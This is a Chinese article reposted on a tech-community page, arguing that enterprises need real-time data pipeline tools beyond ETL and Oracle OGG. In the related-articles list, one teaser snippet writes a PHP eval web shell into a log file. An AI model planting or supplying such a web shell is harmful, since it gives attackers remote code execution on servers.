专栏首页数据猿关于数据、数据流、数据管道的一些看法(一)

关于数据、数据流、数据管道的一些看法(一)

来源:AustinDatabases丨文:Austin Liu

最近间接的获取了不少关于数据流,及数据融合,管道等方面的知识,由于脑子内存小,不写出来很快就会忘记,所以还是硬着头皮写一写。

数据作为一个专有名词,至少有10年的时间,围绕这个词衍生出很多词汇。

大数据分析、数据敏捷分析、数据spss、大数据应用、智能数据AI、围绕这些词汇的产品也不少,如HADOOP、SPARK、HIVE、Teradata、greenlum 等产品。

这些产品已经在很多公司中的大数据分析中得到广泛的应用。 今天想说的并不是这些产品,想谈的是一个最近悄然热门的行业 Datapiple, 数据管道。

什么是数据管道,为什么需要数据管道软件,数据管道在目前的企业中到底有什么地位,如何应用?

有人马上会说,你别糊弄人,你说的不就是ETL嘛,老掉牙了。 是吗?那我提几个问题,你看看如何解决。

问题1 :

业务部门数据由于历史原因,使用的RDS 类型多种多样,有ORALCE ,有SQL SERVER ,有MYSQL ,甚至有MONGODB ,现在大数据分析,要整合部分这些数据库的数据,到一个大数据平台进行数据分析?

问题2:

业务部门数据表设计之初,没有考虑ETL数据抽取的问题,换言之没有时间字段,你如何在上百G的数据中抽取增量数据?

问题3:

业务部门多种需求,要求在业务获得数据的1个小时内,将更新的业务数据传递到数据部门进行处理,获得DATAVIEW

问题4:

业务部门中都有数据分析人员,有的人员精通 T-SQL, 有的擅长 PL/SQL, 还有的只会JAVA ,你如何满足这样多种多样的数据目的地需求。

问题5:

目前由于数据库更新,将ORACLE 数据库替代,使用PostgresQL 来代替ORACLE。目前需要进行灰度发布,ORACLE 和 POSTGRESQL 数据之间进行实时同步,当程序跑通,上线两个礼拜后没有问题,将ORACLE 清除。

说没有什么了不起的同学,站出来,把我上面的问题一并解决吧,估计已经吐血了。

在提升一个高度,站到CDO的角度,你公司使用的数据库类型,我不关心,我只关心你的数据流是否能及时传导到我的各种目的地,让我进行分布式的运算。 同时数据必须在管道中进行加工处理,而我还要一些RAW的数据对我计算的数据进行验证,也就是 单点多传,数据清洗,数据整理的要求。

估计说ETL 的同学,你的胆汁都吐出来了吧!!

这时候我听到一个声音 ORACLE OGG , I am sorry,

1、OGG 有多贵你知道吗?

2、OGG 能满足上面所有需求吗?

价格我们先放到一边,让OGG 支持 ORALCE 到 PG 的数据流, ORACLE 到 TIDB 的数据流, MONGO DB 到 传统数据的数据流(对你没有听错是MONGO DB 到传统数据库的数据流)

OGG还需要在数据的源端,安装AGENT,造成某些服务器的负担和不安全性,如果是外企,还要在评估一番你的数据获取方式安全与否,然后在推诿,扯皮,审批一番,在中国市场瞬息变化的行情下,半年过去了。等批准的时候,市场早就变化了,数据变质了。

而每次数据不能及时供应的背锅侠,运维,还是站在背锅侠的最前端,多个数据源数据获取不及时造成数据获取延迟,数据获取不准确,数据提供的格式不对,数据提取时,对业务系统的负担,造成业务投诉。

终上所述,集中了业务数据分析,大数据部门,运维,人的,机器的,程序的,各种问题,在这个 数据通道的需求中集中爆发,各种不满和委屈淋漓尽致。

我们需要什么:

1、一个能实时获取数据流,将业务数据像水一样的方式,通过水管顺畅的流向各个目的端,支持者。

2、一个能支持各种数据库,及大数据软件的数据交换中心的支持者

3、一个能在数据交换的过程中,还能做点数据的小变动,将不必要的数据,截止在数据的源端的工具。

4、一个能方便快捷,部署,不在数据源端做任何安装的数据获取软件

5、将复杂的ETL + 数据调度,转换为无需担心的数据一致性必然传输。

这样的软件有没有,根本就没有吧 NO NO NO

基于每个数据库的底层原理,ORACLE REDO、ARCHIVE、SQL SERVER CDC、MYSQL BINLOG、 POSTGRESQL WAL、MONGODB 的OPLOG 将这些底层编码破解的方法,就是获得上述能力的先决条件。

避免有广告的嫌疑,这里不提任何公司的名字,但在中国市场,已经有这样的高科技企业,实现了这样的功能。每个高速发展的企业,也需要这样的软件,将死的数据,变化为数据流,让每个数据的索取者,和数据提供者,皆大欢喜,一身轻松。

——END——

本文分享自微信公众号 - 数据猿(datayuancn)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Ubuntu18.04 ROS1Melodic ROS2Dashing 机器人工具集学习镜像的制作说明 Pinguy

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

    zhangrelay
  • 想要如何入侵linux服务器?这几个命令够用了

    [jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog...

    用户6543014
  • 掌握运维必备技能--问题故障定位

    a. on-CPU:执行中,执行中的时间通常又分为用户态时间user和系统态时间sys。

    用户6543014
  • 五分钟搞定Bash功能与使用技巧

    一个完整计算机的体系结构包括:硬件与软件,而软件又分为系统软件与应用软件,负责对硬件仅需管理与操作的是系统软件的内核部分,用户是无法与硬件或内核打交道的,用户通...

    用户6543014
  • 如何实现 Go Module 依赖关系的可视化

    最近,我开发了一个非常简单的小工具,总的代码量 200 行不到。今天,简单介绍下它。这是个什么工具呢?它是一个用于可视化展示 Go Module 依赖关系的工具...

    波罗学
  • CVE-2019-14287(Linux sudo 漏洞)分析

    近日 sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权。官方的修复公告请见:https://www.sudo.ws/alerts/minus_1_...

    Seebug漏洞平台
  • Shell 的18条常用命令整理

    Linux上的文件以.开头的文件被系统视为隐藏文件,仅用ls命令是看不到他们的,而用ls -a除了显示一般文件名外,连隐藏文件也会显示出来。

    用户6543014
  • 简单几步搭建一个基于 Docker 的 Tomcat 运行环境!

    Docker 旨在提供一种应用程序的自动化部署解决方案,在 Linux 系统上迅速创建一个容器 (轻量级虚拟机) 并部署和运行应用程序,并通过配置文件可以轻松实...

    用户6543014
  • ubuntu1~16.04.9 下安装python3.6 详细教程(在腾讯云服务器上安装实例)

    1.输入 sudo add-apt-repository ppa:jonathonf/python-3.6

    用户6544262
  • AOP框架Dora.Interception 3.0 [4]: 基于特性的拦截器注册

    按照单一职责的原则,拦截器只负责需要的拦截操作的执行,至于它采用何种方式应用到目标方法上,以及它在整个拦截器管道中的位置则属于“拦截器注册”的范畴。Dora.I...

    蒋金楠

扫码关注云+社区

领取腾讯云代金券